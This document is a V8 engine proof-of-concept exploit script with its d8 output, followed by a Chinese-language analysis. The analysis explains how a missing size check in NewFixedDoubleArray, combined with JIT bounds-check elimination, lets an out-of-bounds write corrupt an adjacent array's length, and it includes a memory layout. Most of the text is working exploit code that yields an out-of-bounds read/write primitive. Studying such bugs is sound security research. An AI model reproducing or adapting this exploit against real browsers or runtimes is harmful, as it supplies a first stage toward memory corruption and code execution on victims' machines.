poc
$ cat poc.js
array = Array(0x40000).fill(1.1);
args = Array(0x100 - 1).fill(array);
args.push(Array(0x40000 - 4).fill(2.2));
giant_array = Array.prototype.concat.apply([], args);
giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
length_as_double =
new Float64Array(new BigUint64Array([0x22222222n]).buffer)[0];
function trigger(array, oob) {
var x = array.length;
x -= 67108861; // 1 2
x = Math.max(x, 0);
x *= 10; // 10 20
x -= 9; // 1 11
x = Math.max(x, 0);
oob[x] = length_as_double; // fake length
}
for (let i = 0; i < 30000; ++i) {
vul = [1.1, 2.1];
pad = [vul];
double_array = [3.1];
obj = {"a": 2.1};
obj_array = [obj];
trigger(giant_array, vul);
}
console.log("length = ", double_array.length.toString(16));
$ ./d8 poc.js
length = 11111111
漏洞原因分析
NewFixedArray和NewFixedDoubleArray没有对数组的大小进行判断.kFixedDoubleArrayMaxLength = 671088612。所以浮点数组的最大长度为67108862。
giant_array长度为0x40000*0xff + 0x3fffc + 3 = 67108863,其中splice函数会调用NewFixedDoubleArray函数,造成数组长度超过kFixedDoubleArrayMaxLength。
传入giant_array后trigger函数计算得到x为11,而vul长度为2,正常情况下是不会造成越界读写的。
但是v8在执行代码时会进行jit优化,去除掉冗余代码,加速代码执行。在正常情况下trigger函数会默认传入的数组长度<=kFixedDoubleArrayMaxLength.这样子计算出来的x为0或1,而vul[0]或vul[1]是可以正常访问的,那么jit在优化时就会将长度检查这部分优化掉。而我们得到的x为11,这样就可以越界读写,而vul[11]这个位置正是double_array的length位。
内存分布大概如下
32 bit map | 32 bit length
64 bit double vul[0]
64 bit double vul[1]
32 bit map | 32 bit properties
32 bit elements | 32 bit length
32 bit map | 32 bit length
32 bit pad[0] | 32 bit map
32 bit properties | 32 bit elements
32 bit length | 32 bit map
32 bit length | high 32 bit of double_array[0]
low 32 bit of double_array[0] | 32 bit map
32 bit properties | 32 bit elements
32 bit length